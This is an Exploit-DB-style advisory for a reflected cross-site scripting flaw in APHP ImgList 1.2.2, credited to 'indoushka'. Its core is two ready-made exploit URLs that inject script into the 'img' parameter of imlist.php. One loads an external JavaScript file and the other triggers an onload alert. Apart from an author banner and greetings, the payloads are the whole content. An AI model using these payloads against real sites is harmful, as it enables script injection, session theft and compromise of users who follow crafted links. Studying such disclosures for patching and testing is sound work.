APHP ImgList 1.2.2 - Cross-Site Scripting

EDB-ID:

10654

CVE:

N/A


Platform:

PHP

Published:

2009-12-25

========================================================================================                  
| # Title    : APHP ImgList 1.2.2 Cross Site Scripting Vulnerability                   |
| # Author   : indoushka                                                               |
| # email    : indoushka@hotmail.com                                                   |
| # Home     : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860)       |
| # Web Site : www.iq-ty.com                                                           |
| # Script   : Powered by PHP ImgList 1.2.2  (http://www.liquidpulse.net/s.lp?id=17)   |
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu)       |
| # Bug      : XSS                                                                     | 
======================      Exploit By indoushka       =================================
| # Exploit  : 
| 
| 1- http://127.0.0.1:80/pics-small/imlist.php?imx=view&img=1<script/xss+src=http://127.0.0.0.1/xss.js?213771818860></script>&cwd=%2E%2Fimage
|
| 2- http://127.0.0.1/pics-small/imlist.php?imx=view&img=1<img+src=http://127.0.0.1/matrix.jpg+onload=alert(213771818860)>&cwd=%2E%2Fimage
|
================================   Dz-Ghost Team   ========================================
Greetz : all my friend * Dos-Dz * Snakespc * His0k4 * Hussin-X * Str0ke * Saoucha * Star08 |
-------------------------------------------------------------------------------------------